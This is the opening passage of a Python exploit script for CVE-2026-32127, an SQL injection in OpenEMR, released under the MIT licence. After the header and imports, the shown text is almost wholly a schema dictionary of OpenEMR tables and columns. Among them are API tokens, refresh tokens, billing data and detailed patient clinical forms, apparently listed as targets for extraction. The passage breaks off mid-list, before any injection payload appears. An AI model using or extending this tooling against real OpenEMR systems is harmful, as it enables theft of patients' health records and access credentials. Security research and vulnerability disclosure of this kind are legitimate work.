# =============================================================================
# Project Name: CVE-2026-32127_SqlInjectionVulnerabilityOpenEMR8.0.0
# File: exploit.py
# Description: Exploit for CVE-2026-32127 (SQL injection in OpenEMR < 8.0.0.1)
#
# Copyright (c) 2026 Christophe SUBLET, Grenoble INP - Esisar, UGA, CyberSkills, Orion
#
# This file is part of CVE-2026-32127_SqlInjectionVulnerabilityOpenEMR8.0.0
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# ============================================================================= from urllib.request import urlopen, Request from ssl import _create_unverified_context from collections import defaultdict from argparse import ArgumentParser from urllib.parse import urlencode from hashlib import sha1 from sys import exit schema = { "addresses": [ "id", "line1", "line2", "city", "state", "zip", "plus_four", "country", "foreign_id", "district" ], "amc_misc_data": [ "amc_id", "pid", "map_category", "map_id", "date_created", "date_completed", "soc_provided" ], "amendments": [ "amendment_id", "amendment_date", "amendment_by", "amendment_status", "pid", "amendment_desc", "created_by", "modified_by", "created_time", "modified_time" ], "amendments_history": [ "amendment_id", "amendment_note", "amendment_status", "created_by", "created_time" ], "api_log": [ "id", "log_id", "user_id", "patient_id", "ip_address", "method", "request", "request_url", "request_body", "response", "created_time" ], "api_refresh_token": [ "id", "user_id", "client_id", "token", "expiry", "revoked" ], "api_token": [ "id", "user_id", "token", "expiry", "client_id", "scope", "revoked", "context" ], "ar_activity": [ "pid", "encounter", "sequence_no", "code_type", "code", "modifier", "payer_type", "post_time", "post_user", "session_id", "memo", "pay_amount", "adj_amount", "modified_time", "follow_up", "follow_up_note", "account_code", "reason_code", "deleted", "post_date", "payer_claim_number" ], "ar_session": [ "session_id", "payer_id", "user_id", "closed", "reference", "check_date", "deposit_date", "pay_total", "created_time", "modified_time", "global_amount", "payment_type", "description", "adjustment_code", "post_to_date", "patient_id", "payment_method" ], "audit_details": [ "id", "field_name", "field_value", "audit_master_id", "entry_identification" ], "audit_master": [ "id", "pid", "user_id", "approval_status", "comments", "created_time", "modified_time", "ip_address", "type", "is_qrda_document", 
"is_unstructured_document" ], "automatic_notification": [ "notification_id", "sms_gateway_type", "provider_name", "message", "email_sender", "email_subject", "type" ], "background_services": [ "name", "title", "active", "running", "next_run", "execute_interval", "function", "require_once", "sort_order" ], "batchcom": [ "id", "patient_id", "sent_by", "msg_type", "msg_subject", "msg_text", "msg_date_sent" ], "benefit_eligibility": [ "response_id", "verification_id", "type", "benefit_type", "start_date", "end_date", "coverage_level", "coverage_type", "plan_type", "plan_description", "coverage_period", "amount", "percent", "network_ind", "message", "response_status", "response_create_date", "response_modify_date" ], "billing": [ "id", "date", "code_type", "code", "pid", "provider_id", "user", "groupname", "authorized", "encounter", "code_text", "billed", "activity", "payer_id", "bill_process", "bill_date", "process_date", "process_file", "modifier", "units", "fee", "justify", "target", "x12_partner_id", "ndc_info", "notecodes", "external_id", "pricelevel", "revenue_code", "chargecat" ], "calendar_external": [ "id", "date", "description", "source" ], "care_teams": [ "id", "uuid", "pid", "status", "team_name", "note", "date_created", "date_updated", "created_by", "updated_by" ], "care_team_member": [ "id", "care_team_id", "user_id", "contact_id", "role", "facility_id", "provider_since", "status", "date_created", "date_updated", "created_by", "updated_by", "note" ], "categories": [ "id", "name", "value", "parent", "lft", "rght", "aco_spec", "codes" ], "categories_seq": [ "id" ], "categories_to_documents": [ "category_id", "document_id" ], "ccda": [ "id", "uuid", "pid", "encounter", "ccda_data", "time", "status", "updated_date", "user_id", "couch_docid", "couch_revid", "hash", "view", "transfer", "emr_transfer", "encrypted", "transaction_id" ], "ccda_components": [ "ccda_components_id", "ccda_components_field", "ccda_components_name", "ccda_type" ], "ccda_field_mapping": [ 
"id", "table_id", "ccda_field" ], "ccda_sections": [ "ccda_sections_id", "ccda_components_id", "ccda_sections_field", "ccda_sections_name", "ccda_sections_req_mapping" ], "ccda_table_mapping": [ "id", "ccda_component", "ccda_component_section", "form_dir", "form_type", "form_table", "user_id", "deleted", "timestamp" ], "chart_tracker": [ "ct_pid", "ct_when", "ct_userid", "ct_location" ], "claims": [ "patient_id", "encounter_id", "version", "payer_id", "status", "payer_type", "bill_process", "bill_time", "process_time", "process_file", "target", "x12_partner_id", "submitted_claim" ], "clinical_notes_documents": [ "id", "clinical_note_id", "document_id", "created_at", "created_by" ], "clinical_notes_procedure_results": [ "id", "clinical_note_id", "procedure_result_id", "created_at", "created_by" ], "clinical_plans": [ "id", "pid", "normal_flag", "cqm_flag", "cqm_2011_flag", "cqm_2014_flag", "cqm_measure_group" ], "clinical_plans_rules": [ "plan_id", "rule_id" ], "clinical_rules": [ "id", "pid", "active_alert_flag", "passive_alert_flag", "cqm_flag", "cqm_2011_flag", "cqm_2014_flag", "cqm_nqf_code", "cqm_pqri_code", "amc_flag", "amc_2011_flag", "amc_2014_flag", "amc_2015_flag", "amc_code", "amc_code_2014", "amc_code_2015", "amc_2014_stage1_flag", "amc_2014_stage2_flag", "patient_reminder_flag", "bibliographic_citation", "developer", "funding_source", "release_version", "web_reference", "linked_referential_cds", "access_control", "patient_dob_usage", "patient_ethnicity_usage", "patient_health_status_usage", "patient_gender_identity_usage", "patient_language_usage", "patient_race_usage", "patient_sex_usage", "patient_sexual_orientation_usage", "patient_sodh_usage" ], "clinical_rules_log": [ "id", "date", "pid", "uid", "category", "value", "new_value", "facility_id" ], "codes": [ "id", "code_text", "code_text_short", "code", "code_type", "modifier", "units", "fee", "superbill", "related_code", "taxrates", "cyp_factor", "active", "reportable", "financial_reporting", 
"revenue_code" ], "codes_history": [ "log_id", "date", "code", "modifier", "active", "diagnosis_reporting", "financial_reporting", "category", "code_type_name", "code_text", "code_text_short", "prices", "action_type", "update_by" ], "code_types": [ "ct_key", "ct_id", "ct_seq", "ct_mod", "ct_just", "ct_mask", "ct_fee", "ct_rel", "ct_nofs", "ct_diag", "ct_active", "ct_label", "ct_external", "ct_claim", "ct_proc", "ct_term", "ct_problem", "ct_drug" ], "contact": [ "id", "foreign_id" ], "contact_address": [ "id", "contact_id", "address_id", "priority", "type", "use", "notes", "status", "is_primary", "created_date", "period_start", "period_end", "inactivated_reason" ], "contact_relation": [ "id", "contact_id", "target_table", "target_id", "active", "role", "relationship", "contact_priority", "is_primary_contact", "is_emergency_contact", "can_make_medical_decisions", "can_receive_medical_info", "start_date", "end_date", "notes", "created_date", "created_by", "updated_date", "updated_by" ], "contact_telecom": [ "id", "contact_id", "rank", "system", "use", "value", "status", "is_primary", "notes", "period_start", "period_end", "inactivated_reason", "created_date", "created_by", "updated_date", "updated_by" ], "customlists": [ "cl_list_slno", "cl_list_id", "cl_list_item_id", "cl_list_type", "cl_list_item_short", "cl_list_item_long", "cl_list_item_level", "cl_order", "cl_deleted", "cl_creator" ], "dated_reminders": [ "dr_id", "dr_from_ID", "dr_message_text", "dr_message_sent_date", "dr_message_due_date", "pid", "message_priority", "message_processed", "processed_date", "dr_processed_by" ], "dated_reminders_link": [ "dr_link_id", "dr_id", "to_id" ], "direct_message_log": [ "id", "msg_type", "msg_id", "sender", "recipient", "create_ts", "status", "status_info", "status_ts", "patient_id", "user_id" ], "documents": [ "id", "uuid", "type", "size", "date", "date_expires", "url", "thumb_url", "mimetype", "pages", "owner", "revision", "foreign_id", "docdate", "hash", "list_id", 
"name", "drive_uuid", "couch_docid", "couch_revid", "storagemethod", "path_depth", "imported", "encounter_id", "encounter_check", "audit_master_approval_status", "audit_master_id", "documentationOf", "encrypted", "document_data", "deleted", "foreign_reference_id", "foreign_reference_table" ], "documents_legal_categories": [ "dlc_id", "dlc_category_type", "dlc_category_name", "dlc_category_parent" ], "documents_legal_detail": [ "dld_id", "dld_pid", "dld_facility", "dld_provider", "dld_encounter", "dld_master_docid", "dld_signed", "dld_signed_time", "dld_filepath", "dld_filename", "dld_signing_person", "dld_sign_level", "dld_content", "dld_file_for_pdf_generation", "dld_denial_reason", "dld_moved", "dld_patient_comments" ], "documents_legal_master": [ "dlm_category", "dlm_subcategory", "dlm_document_id", "dlm_document_name", "dlm_filepath", "dlm_facility", "dlm_provider", "dlm_sign_height", "dlm_sign_width", "dlm_filename", "dlm_effective_date", "dlm_version", "content", "dlm_savedsign", "dlm_review", "dlm_upload_type" ], "document_templates": [ "id", "pid", "provider", "encounter", "modified_date", "profile", "category", "location", "template_name", "status", "send_date", "end_date", "size", "template_content", "mime" ], "document_template_profiles": [ "id", "template_id", "profile", "template_name", "category", "provider", "modified_date", "member_of", "active", "recurring", "event_trigger", "period", "notify_trigger", "notify_period" ], "drugs": [ "drug_id", "uuid", "name", "ndc_number", "on_order", "reorder_point", "max_level", "last_notify", "reactions", "form", "size", "unit", "route", "substitute", "related_code", "cyp_factor", "active", "allow_combining", "allow_multiple", "drug_code", "consumable", "dispensable", "date_created", "last_updated" ], "drug_inventory": [ "inventory_id", "drug_id", "lot_number", "expiration", "manufacturer", "on_hand", "warehouse_id", "vendor_id", "last_notify", "destroy_date", "destroy_method", "destroy_witness", "destroy_notes" 
], "drug_sales": [ "sale_id", "drug_id", "inventory_id", "prescription_id", "pid", "encounter", "user", "sale_date", "quantity", "fee", "billed", "xfer_inventory_id", "distributor_id", "notes", "bill_date", "pricelevel", "selector", "trans_type", "chargecat", "uuid", "pharmacy_supply_type", "last_updated", "date_created", "updated_by", "created_by" ], "drug_templates": [ "drug_id", "selector", "dosage", "period", "quantity", "refills", "taxrates", "pkgqty" ], "dsi_source_attributes": [ "id", "client_id", "list_id", "option_id", "clinical_rule_id", "source_value", "created_by", "last_updated_by", "created_at", "last_updated_at" ], "edi_sequences": [ "id" ], "eligibility_verification": [ "verification_id", "response_id", "insurance_id", "eligibility_check_date", "copay", "deductible", "deductiblemet", "create_date" ], "email_queue": [ "id", "sender", "recipient", "subject", "body", "datetime_queued", "sent", "datetime_sent", "error", "error_message", "datetime_error", "template_name" ], "employer_data": [ "id", "name", "street", "street_line_2", "postal_code", "city", "state", "country", "date", "pid", "start_date", "end_date", "occupation", "industry", "created_by", "uuid" ], "enc_category_map": [ "rule_enc_id", "main_cat_id" ], "erx_narcotics": [ "id", "drug", "dea_number", "csa_sch", "narc", "other_names" ], "erx_rx_log": [ "id", "prescription_id", "date", "time", "code", "status", "message_id", "read" ], "erx_ttl_touch": [ "patient_id", "process", "updated" ], "esign_signatures": [ "id", "tid", "table", "uid", "datetime", "is_lock", "amendment", "hash", "signature_hash" ], "export_job": [ "id", "uuid", "user_id", "client_id", "status", "start_time", "resource_include_time", "output_format", "request_uri", "resources", "output", "errors", "access_token_id" ], "extended_log": [ "id", "date", "event", "user", "recipient", "description", "patient_id" ], "external_encounters": [ "ee_id", "ee_date", "ee_pid", "ee_provider_id", "ee_facility_id", 
"ee_encounter_diagnosis", "ee_external_id" ], "external_procedures": [ "ep_id", "ep_date", "ep_code_type", "ep_code", "ep_pid", "ep_encounter", "ep_code_text", "ep_facility_id", "ep_external_id" ], "facility": [ "id", "uuid", "name", "phone", "fax", "street", "city", "state", "postal_code", "country_code", "federal_ein", "website", "email", "service_location", "billing_location", "accepts_assignment", "pos_code", "x12_sender_id", "attn", "domain_identifier", "facility_npi", "facility_taxonomy", "tax_id_type", "color", "primary_business_entity", "facility_code", "extra_validation", "mail_street", "mail_street2", "mail_city", "mail_state", "mail_zip", "oid", "iban", "info", "weno_id", "inactive", "date_created", "last_updated" ], "facility_user_ids": [ "id", "uid", "facility_id", "uuid", "field_id", "field_value", "date_created", "last_updated" ], "fee_schedule": [ "id", "insurance_company_id", "plan", "code", "modifier", "type", "fee", "effective_date" ], "fee_sheet_options": [ "fs_category", "fs_option", "fs_codes" ], "forms": [ "id", "date", "encounter", "form_name", "form_id", "pid", "user", "groupname", "authorized", "deleted", "formdir", "therapy_group_id", "issue_id", "provider_id" ], "form_care_plan": [ "id", "date", "pid", "encounter", "user", "groupname", "authorized", "activity", "code", "codetext", "description", "external_id", "care_plan_type", "note_related_to", "date_end", "reason_code", "reason_description", "reason_date_low", "reason_date_high", "reason_status", "plan_status", "proposed_date" ], "form_clinical_instructions": [ "id", "pid", "encounter", "user", "instruction", "date", "activity" ], "form_clinical_notes": [ "id", "form_id", "uuid", "date", "pid", "encounter", "user", "groupname", "authorized", "activity", "code", "codetext", "description", "external_id", "clinical_notes_type", "clinical_notes_category", "note_related_to", "last_updated" ], "form_dictation": [ "id", "date", "pid", "user", "groupname", "authorized", "activity", 
"dictation", "additional_notes" ], "form_encounter": [ "id", "uuid", "date", "reason", "facility", "facility_id", "pid", "encounter", "onset_date", "sensitivity", "billing_note", "pc_catid", "last_level_billed", "last_level_closed", "last_stmt_date", "stmt_count", "provider_id", "supervisor_id", "invoice_refno", "referral_source", "billing_facility", "external_id", "pos_code", "parent_encounter_id", "class_code", "shift", "voucher_number", "discharge_disposition", "encounter_type_code", "encounter_type_description", "referring_provider_id", "date_end", "in_collection", "last_update", "ordering_provider_id" ], "form_eye_acuity": [ "id", "pid", "SCODVA", "SCOSVA", "PHODVA", "PHOSVA", "CTLODVA", "CTLOSVA", "MRODVA", "MROSVA", "SCNEARODVA", "SCNEAROSVA", "MRNEARODVA", "MRNEAROSVA", "GLAREODVA", "GLAREOSVA", "GLARECOMMENTS", "ARODVA", "AROSVA", "CRODVA", "CROSVA", "CTLODVA1", "CTLOSVA1", "PAMODVA", "PAMOSVA", "LIODVA", "LIOSVA", "WODVANEAR", "OSVANEARCC", "BINOCVA" ], "form_eye_antseg": [ "id", "pid", "ODSCHIRMER1", "OSSCHIRMER1", "ODSCHIRMER2", "OSSCHIRMER2", "ODTBUT", "OSTBUT", "OSCONJ", "ODCONJ", "ODCORNEA", "OSCORNEA", "ODAC", "OSAC", "ODLENS", "OSLENS", "ODIRIS", "OSIRIS", "PUPIL_NORMAL", "ODPUPILSIZE1", "ODPUPILSIZE2", "ODPUPILREACTIVITY", "ODAPD", "OSPUPILSIZE1", "OSPUPILSIZE2", "OSPUPILREACTIVITY", "OSAPD", "DIMODPUPILSIZE1", "DIMODPUPILSIZE2", "DIMODPUPILREACTIVITY", "DIMOSPUPILSIZE1", "DIMOSPUPILSIZE2", "DIMOSPUPILREACTIVITY", "PUPIL_COMMENTS", "ODKTHICKNESS", "OSKTHICKNESS", "ODGONIO", "OSGONIO", "ANTSEG_COMMENTS" ], "form_eye_base": [ "id", "date", "pid", "user", "groupname", "authorized", "activity" ], "form_eye_biometrics": [ "id", "pid", "ODK1", "ODK2", "ODK2AXIS", "OSK1", "OSK2", "OSK2AXIS", "ODAXIALLENGTH", "OSAXIALLENGTH", "ODPDMeasured", "OSPDMeasured", "ODACD", "OSACD", "ODW2W", "OSW2W", "ODLT", "OSLT" ], "form_eye_external": [ "id", "pid", "RUL", "LUL", "RLL", "LLL", "RBROW", "LBROW", "RMCT", "LMCT", "RADNEXA", "LADNEXA", "RMRD", "LMRD", "RLF", 
"LLF", "RVFISSURE", "LVFISSURE", "ODHERTEL", "OSHERTEL", "HERTELBASE", "RCAROTID", "LCAROTID", "RTEMPART", "LTEMPART", "RCNV", "LCNV", "RCNVII", "LCNVII", "EXT_COMMENTS" ], "form_eye_hpi": [ "id", "pid", "CC1", "HPI1", "QUALITY1", "TIMING1", "DURATION1", "CONTEXT1", "SEVERITY1", "MODIFY1", "ASSOCIATED1", "LOCATION1", "CHRONIC1", "CHRONIC2", "CHRONIC3", "CC2", "HPI2", "QUALITY2", "TIMING2", "DURATION2", "CONTEXT2", "SEVERITY2", "MODIFY2", "ASSOCIATED2", "LOCATION2", "CC3", "HPI3", "QUALITY3", "TIMING3", "DURATION3", "CONTEXT3", "SEVERITY3", "MODIFY3", "ASSOCIATED3", "LOCATION3" ], "form_eye_locking": [ "id", "pid", "IMP", "PLAN", "Resource", "Technician", "LOCKED", "LOCKEDDATE", "LOCKEDBY" ], "form_eye_mag_dispense": [ "id", "date", "encounter", "pid", "user", "groupname", "authorized", "activity", "REFDATE", "REFTYPE", "RXTYPE", "ODSPH", "ODCYL", "ODAXIS", "OSSPH", "OSCYL", "OSAXIS", "ODMIDADD", "OSMIDADD", "ODADD", "OSADD", "ODHPD", "ODHBASE", "ODVPD", "ODVBASE", "ODSLABOFF", "ODVERTEXDIST", "OSHPD", "OSHBASE", "OSVPD", "OSVBASE", "OSSLABOFF", "OSVERTEXDIST", "ODMPDD", "ODMPDN", "OSMPDD", "OSMPDN", "BPDD", "BPDN", "LENS_MATERIAL", "LENS_TREATMENTS", "CTLMANUFACTUREROD", "CTLMANUFACTUREROS", "CTLSUPPLIEROD", "CTLSUPPLIEROS", "CTLBRANDOD", "CTLBRANDOS", "CTLODQUANTITY", "CTLOSQUANTITY", "ODDIAM", "ODBC", "OSDIAM", "OSBC", "RXCOMMENTS", "COMMENTS" ], "form_eye_mag_impplan": [ "id", "form_id", "pid", "title", "code", "codetype", "codedesc", "codetext", "plan", "PMSFH_link", "IMPPLAN_order" ], "form_eye_mag_orders": [ "id", "form_id", "pid", "ORDER_DETAILS", "ORDER_STATUS", "ORDER_PRIORITY", "ORDER_DATE_PLACED", "ORDER_PLACED_BYWHOM", "ORDER_DATE_COMPLETED", "ORDER_COMPLETED_BYWHOM" ], "form_eye_mag_prefs": [ "PEZONE", "LOCATION", "LOCATION_text", "id", "selection", "ZONE_ORDER", "GOVALUE", "ordering", "FILL_ACTION", "GORIGHT", "GOLEFT", "UNSPEC" ], "form_eye_mag_wearing": [ "id", "ENCOUNTER", "FORM_ID", "PID", "RX_NUMBER", "ODSPH", "ODCYL", "ODAXIS", "OSSPH", "OSCYL", 
"OSAXIS", "ODMIDADD", "OSMIDADD", "ODADD", "OSADD", "ODVA", "OSVA", "ODNEARVA", "OSNEARVA", "ODHPD", "ODHBASE", "ODVPD", "ODVBASE", "ODSLABOFF", "ODVERTEXDIST", "OSHPD", "OSHBASE", "OSVPD", "OSVBASE", "OSSLABOFF", "OSVERTEXDIST", "ODMPDD", "ODMPDN", "OSMPDD", "OSMPDN", "BPDD", "BPDN", "LENS_MATERIAL", "LENS_TREATMENTS", "RX_TYPE", "COMMENTS" ], "form_eye_neuro": [ "id", "pid", "ACT", "ACT5CCDIST", "ACT1CCDIST", "ACT2CCDIST", "ACT3CCDIST", "ACT4CCDIST", "ACT6CCDIST", "ACT7CCDIST", "ACT8CCDIST", "ACT9CCDIST", "ACT10CCDIST", "ACT11CCDIST", "ACT1SCDIST", "ACT2SCDIST", "ACT3SCDIST", "ACT4SCDIST", "ACT5SCDIST", "ACT6SCDIST", "ACT7SCDIST", "ACT8SCDIST", "ACT9SCDIST", "ACT10SCDIST", "ACT11SCDIST", "ACT1SCNEAR", "ACT2SCNEAR", "ACT3SCNEAR", "ACT4SCNEAR", "ACT5CCNEAR", "ACT6CCNEAR", "ACT7CCNEAR", "ACT8CCNEAR", "ACT9CCNEAR", "ACT10CCNEAR", "ACT11CCNEAR", "ACT5SCNEAR", "ACT6SCNEAR", "ACT7SCNEAR", "ACT8SCNEAR", "ACT9SCNEAR", "ACT10SCNEAR", "ACT11SCNEAR", "ACT1CCNEAR", "ACT2CCNEAR", "ACT3CCNEAR", "ACT4CCNEAR", "MOTILITYNORMAL", "MOTILITY_RS", "MOTILITY_RI", "MOTILITY_RR", "MOTILITY_RL", "MOTILITY_LS", "MOTILITY_LI", "MOTILITY_LR", "MOTILITY_LL", "MOTILITY_RRSO", "MOTILITY_RLSO", "MOTILITY_RRIO", "MOTILITY_RLIO", "MOTILITY_LRSO", "MOTILITY_LLSO", "MOTILITY_LRIO", "MOTILITY_LLIO", "NEURO_COMMENTS", "STEREOPSIS", "ODNPA", "OSNPA", "VERTFUSAMPS", "DIVERGENCEAMPS", "NPC", "DACCDIST", "DACCNEAR", "CACCDIST", "CACCNEAR", "ODCOLOR", "OSCOLOR", "ODCOINS", "OSCOINS", "ODREDDESAT", "OSREDDESAT" ], "form_eye_postseg": [ "id", "pid", "ODDISC", "OSDISC", "ODCUP", "OSCUP", "ODMACULA", "OSMACULA", "ODVESSELS", "OSVESSELS", "ODVITREOUS", "OSVITREOUS", "ODPERIPH", "OSPERIPH", "ODCMT", "OSCMT", "RETINA_COMMENTS", "DIL_RISKS", "DIL_MEDS", "WETTYPE", "ATROPINE", "CYCLOMYDRIL", "TROPICAMIDE", "CYCLOGYL", "NEO25" ], "form_eye_refraction": [ "id", "pid", "MRODSPH", "MRODCYL", "MRODAXIS", "MRODPRISM", "MRODBASE", "MRODADD", "MROSSPH", "MROSCYL", "MROSAXIS", "MROSPRISM", "MROSBASE", "MROSADD", 
"MRODNEARSPHERE", "MRODNEARCYL", "MRODNEARAXIS", "MRODPRISMNEAR", "MRODBASENEAR", "MROSNEARSHPERE", "MROSNEARCYL", "MROSNEARAXIS", "MROSPRISMNEAR", "MROSBASENEAR", "CRODSPH", "CRODCYL", "CRODAXIS", "CROSSPH", "CROSCYL", "CROSAXIS", "CRCOMMENTS", "BALANCED", "ARODSPH", "ARODCYL", "ARODAXIS", "AROSSPH", "AROSCYL", "AROSAXIS", "ARODADD", "AROSADD", "ARNEARODVA", "ARNEAROSVA", "ARODPRISM", "AROSPRISM", "CTLODSPH", "CTLODCYL", "CTLODAXIS", "CTLODBC", "CTLODDIAM", "CTLOSSPH", "CTLOSCYL", "CTLOSAXIS", "CTLOSBC", "CTLOSDIAM", "CTL_COMMENTS", "CTLMANUFACTUREROD", "CTLSUPPLIEROD", "CTLBRANDOD", "CTLMANUFACTUREROS", "CTLSUPPLIEROS", "CTLBRANDOS", "CTLODADD", "CTLOSADD", "NVOCHECKED", "ADDCHECKED" ], "form_eye_ros": [ "id", "pid", "ROSGENERAL", "ROSHEENT", "ROSCV", "ROSPULM", "ROSGI", "ROSGU", "ROSDERM", "ROSNEURO", "ROSPSYCH", "ROSMUSCULO", "ROSIMMUNO", "ROSENDOCRINE", "ROSCOMMENTS" ], "form_eye_vitals": [ "id", "pid", "alert", "oriented", "confused", "ODIOPAP", "OSIOPAP", "ODIOPTPN", "OSIOPTPN", "ODIOPFTN", "OSIOPFTN", "IOPTIME", "ODIOPPOST", "OSIOPPOST", "IOPPOSTTIME", "ODIOPTARGET", "OSIOPTARGET", "AMSLEROD", "AMSLEROS", "ODVF1", "ODVF2", "ODVF3", "ODVF4", "OSVF1", "OSVF2", "OSVF3", "OSVF4" ], "form_functional_cognitive_status": [ "id", "date", "pid", "encounter", "user", "groupname", "authorized", "activity", "code", "codetext", "description", "external_id" ], "form_groups_encounter": [ "id", "date", "reason", "facility", "facility_id", "group_id", "encounter", "onset_date", "sensitivity", "billing_note", "pc_catid", "last_level_billed", "last_level_closed", "last_stmt_date", "stmt_count", "provider_id", "supervisor_id", "invoice_refno", "referral_source", "billing_facility", "external_id", "pos_code", "counselors", "appt_id" ], "form_group_attendance": [ "id", "date", "group_id", "user", "groupname", "authorized", "encounter_id", "activity" ], "form_history_sdoh": [ "id", "uuid", "pid", "encounter", "created_at", "updated_at", "created_by", "updated_by", 
"assessment_date", "screening_tool", "assessor", "food_insecurity", "food_insecurity_notes", "housing_instability", "housing_instability_notes", "transportation_insecurity", "transportation_insecurity_notes", "utilities_insecurity", "utilities_insecurity_notes", "interpersonal_safety", "interpersonal_safety_notes", "financial_strain", "financial_strain_notes", "social_isolation", "social_isolation_notes", "childcare_needs", "childcare_needs_notes", "digital_access", "digital_access_notes", "employment_status", "education_level", "caregiver_status", "veteran_status", "pregnancy_status", "pregnancy_edd", "pregnancy_intent", "postpartum_status", "postpartum_end", "goals", "interventions", "instrument_score", "positive_domain_count", "declined_flag", "disability_status", "disability_status_notes", "disability_scale", "hunger_q1", "hunger_q2", "hunger_score" ], "form_history_sdoh_health_concerns": [ "id", "sdoh_history_id", "health_concern_id", "created_at", "created_by" ], "form_misc_billing_options": [ "id", "date", "pid", "user", "groupname", "authorized", "activity", "employment_related", "auto_accident", "accident_state", "other_accident", "medicaid_referral_code", "epsdt_flag", "provider_qualifier_code", "provider_id", "outside_lab", "lab_amount", "is_unable_to_work", "onset_date", "date_initial_treatment", "off_work_from", "off_work_to", "is_hospitalized", "hospitalization_date_from", "hospitalization_date_to", "medicaid_resubmission_code", "medicaid_original_reference", "prior_auth_number", "comments", "replacement_claim", "icn_resubmission_number", "box_14_date_qual", "box_15_date_qual", "encounter" ], "form_observation": [ "form_id", "date", "pid", "encounter", "user", "groupname", "authorized", "activity", "code", "observation", "ob_value", "ob_unit", "description", "code_type", "table_code", "ob_code", "ob_type", "ob_status", "result_status", "ob_reason_status", "ob_reason_code", "ob_reason_text", "ob_documentationof_table", "ob_documentationof_table_id", 
"date_end", "id", "parent_observation_id", "category", "questionnaire_response_id", "uuid", "ob_value_code_description" ], "form_questionnaire_assessments": [ "id", "date", "response_id", "pid", "user", "groupname", "authorized", "activity", "copyright", "form_name", "response_meta", "questionnaire_id", "questionnaire", "questionnaire_response", "lform", "lform_response", "category" ], "form_reviewofs": [ "id", "date", "pid", "user", "groupname", "authorized", "activity", "fever", "chills", "night_sweats", "weight_loss", "poor_appetite", "insomnia", "fatigued", "depressed", "hyperactive", "exposure_to_foreign_countries", "cataracts", "cataract_surgery", "glaucoma", "double_vision", "blurred_vision", "poor_hearing", "headaches", "ringing_in_ears", "bloody_nose", "sinusitis", "sinus_surgery", "dry_mouth", "strep_throat", "tonsillectomy", "swollen_lymph_nodes", "throat_cancer", "throat_cancer_surgery", "heart_attack", "irregular_heart_beat", "chest_pains", "shortness_of_breath", "high_blood_pressure", "heart_failure", "poor_circulation", "vascular_surgery", "cardiac_catheterization", "coronary_artery_bypass", "heart_transplant", "stress_test", "emphysema", "chronic_bronchitis", "interstitial_lung_disease", "shortness_of_breath_2", "lung_cancer", "lung_cancer_surgery", "pheumothorax", "stomach_pains", "peptic_ulcer_disease", "gastritis", "endoscopy", "polyps", "colonoscopy", "colon_cancer", "colon_cancer_surgery", "ulcerative_colitis", "crohns_disease", "appendectomy", "divirticulitis", "divirticulitis_surgery", "gall_stones", "cholecystectomy", "hepatitis", "cirrhosis_of_the_liver", "splenectomy", "kidney_failure", "kidney_stones", "kidney_cancer", "kidney_infections", "bladder_infections", "bladder_cancer", "prostate_problems", "prostate_cancer", "kidney_transplant", "sexually_transmitted_disease", "burning_with_urination", "discharge_from_urethra", "rashes", "infections", "ulcerations", "pemphigus", "herpes", "osetoarthritis", "rheumotoid_arthritis", "lupus", 
"ankylosing_sondlilitis", "swollen_joints", "stiff_joints", "broken_bones", "neck_problems", "back_problems", "back_surgery", "scoliosis", "herniated_disc", "shoulder_problems", "elbow_problems", "wrist_problems", "hand_problems", "hip_problems", "knee_problems", "ankle_problems", "foot_problems", "insulin_dependent_diabetes", "noninsulin_dependent_diabetes", "hypothyroidism", "hyperthyroidism", "cushing_syndrom", "addison_syndrom", "additional_notes" ], "form_ros": [ "id", "pid", "activity", "date", "weight_change", "weakness", "fatigue", "anorexia", "fever", "chills", "night_sweats", "insomnia", "irritability", "heat_or_cold", "intolerance", "change_in_vision", "glaucoma_history", "eye_pain", "irritation", "redness", "excessive_tearing", "double_vision", "blind_spots", "photophobia", "hearing_loss", "discharge", "pain", "vertigo", "tinnitus", "frequent_colds", "sore_throat", "sinus_problems", "post_nasal_drip", "nosebleed", "snoring", "apnea", "breast_mass", "breast_discharge", "biopsy", "abnormal_mammogram", "cough", "sputum", "shortness_of_breath", "wheezing", "hemoptsyis", "asthma", "copd", "chest_pain", "palpitation", "syncope", "pnd", "doe", "orthopnea", "peripheal", "edema", "legpain_cramping", "history_murmur", "arrythmia", "heart_problem", "dysphagia", "heartburn", "bloating", "belching", "flatulence", "nausea", "vomiting", "hematemesis", "gastro_pain", "food_intolerance", "hepatitis", "jaundice", "hematochezia", "changed_bowel", "diarrhea", "constipation", "polyuria", "polydypsia", "dysuria", "hematuria", "frequency", "urgency", "incontinence", "renal_stones", "utis", "hesitancy", "dribbling", "stream", "nocturia", "erections", "ejaculations", "g", "p", "ap", "lc", "mearche", "menopause", "lmp", "f_frequency", "f_flow", "f_symptoms", "abnormal_hair_growth", "f_hirsutism", "joint_pain", "swelling", "m_redness", "m_warm", "m_stiffness", "muscle", "m_aches", "fms", "arthritis", "loc", "seizures", "stroke", "tia", "n_numbness", "n_weakness", "paralysis", 
